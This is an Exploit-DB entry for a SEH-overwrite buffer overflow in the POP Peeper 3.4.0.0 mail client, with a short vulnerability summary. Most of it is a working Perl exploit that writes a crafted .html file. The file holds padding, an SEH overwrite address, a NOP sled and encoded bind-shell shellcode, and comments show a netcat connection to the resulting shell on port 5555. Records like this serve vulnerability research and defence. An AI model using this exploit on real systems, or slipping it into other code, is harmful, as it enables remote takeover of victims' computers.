POP Peeper 3.4.0.0 .html file Universal SEH Overwrite Exploit

vendor:

POP Peeper

by:

Stack

7.5

CVSS

HIGH

Universal SEH Overwrite

CWE

Product Name: POP Peeper

Affected Version From: POP Peeper 3.4.0.0

Affected Version To: POP Peeper 3.4.0.0

Patch Exists: NO

Related CWE:

CPE: a:poppeeper:pop_peeper:3.4.0.0

Metasploit:

Other Scripts:

Platforms Tested: Windows

POP Peeper 3.4.0.0 .html file Universal SEH Overwrite Exploit

This exploit allows an attacker to perform a universal SEH overwrite in POP Peeper 3.4.0.0. By opening a specially crafted .html file, the attacker can overwrite the Structured Exception Handler (SEH) and gain control of the program's execution flow.

Mitigation:

Apply the latest patch or upgrade to a newer version of POP Peeper to mitigate this vulnerability.

Source

Exploit-DB raw data:

# POP Peeper 3.4.0.0 .html file Universal SEH Overwrite Exploit
# Exploit By Stack
# Mountassif Moad
# How to use : file > Open message or Ctrl + O
# Select The .html file ......>>
# Connect With 5555 Port
# C:\nc>nc -v 127.0.0.1 5555
# DNS fwd/rev mismatch: localhost != stack-a4eeb2267
# localhost [127.0.0.1] 5555 (?) open
# Microsoft Windows XP [version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# C:\Program Files\POP Peeper>
# Boom Box Connected :d
# Thnx Simo- SOft - Jadi - Str0ke
# usage perl xpl.pl >>stack.html
my $mp=
################
"\x46\x52\x4F\x4D\x3A\x20". # First Header
################
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". # Start Junk
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". # End Junk
################
"\xeb\x06\x90\x90". # Next_Seh
"\x4c\x51\x01\x10". # SEh ( Universal )
################
"\x90\x90\x90\x90\x90\x90\x90\x90". # Start Nop
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90". # End Nop
################
# Start Scode
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e".
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38".
"\x4e\x36\x46\x42\x46\x42\x4b\x38\x45\x54\x4e\x43\x4b\x58\x4e\x57".
"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58".
"\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x38".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c".
"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x38".
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54".
"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38".
"\x49\x58\x4e\x36\x46\x52\x4e\x51\x41\x56\x43\x4c\x41\x53\x4b\x4d".
"\x46\x36\x4b\x38\x43\x34\x42\x43\x4b\x48\x42\x44\x4e\x30\x4b\x48".
"\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x35\x4a\x36".
"\x50\x58\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46".
"\x43\x45\x48\x36\x4a\x36\x43\x33\x44\x33\x4a\x46\x47\x57\x43\x57".
"\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e".
"\x48\x56\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x56\x44\x30".
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35".
"\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x45\x43\x55\x43\x55\x43\x44".
"\x43\x45\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x45\x31".
"\x43\x4b\x48\x56\x43\x35\x49\x38\x41\x4e\x45\x49\x4a\x36\x46\x4a".
"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x56\x42\x41".
"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32".
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d".
"\x4a\x56\x45\x4e\x49\x54\x48\x48\x49\x44\x47\x35\x4f\x4f\x48\x4d".
"\x42\x45\x46\x35\x46\x55\x45\x55\x4f\x4f\x42\x4d\x43\x49\x4a\x46".
"\x47\x4e\x49\x37\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x55".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x36\x43\x56".
"\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x45\x49\x55\x49\x32\x4e\x4c".
"\x49\x48\x47\x4e\x4c\x36\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x44\x4e\x32".
"\x43\x39\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56".
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x55\x41\x45\x41\x55\x4c\x46".
"\x41\x50\x41\x45\x41\x35\x45\x45\x41\x35\x4f\x4f\x42\x4d\x4a\x56".
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f".
"\x43\x48\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d".
"\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x45\x43\x55\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a".
 # End Scode
################
"\x0D\x54\x4F\x3A\x20\x53\x74\x61\x63\x6B\x20\x3A\x64\x20". # Second Header
"\x0D\x0D";
################
print $mp;

# milw0rm.com [2009-03-23]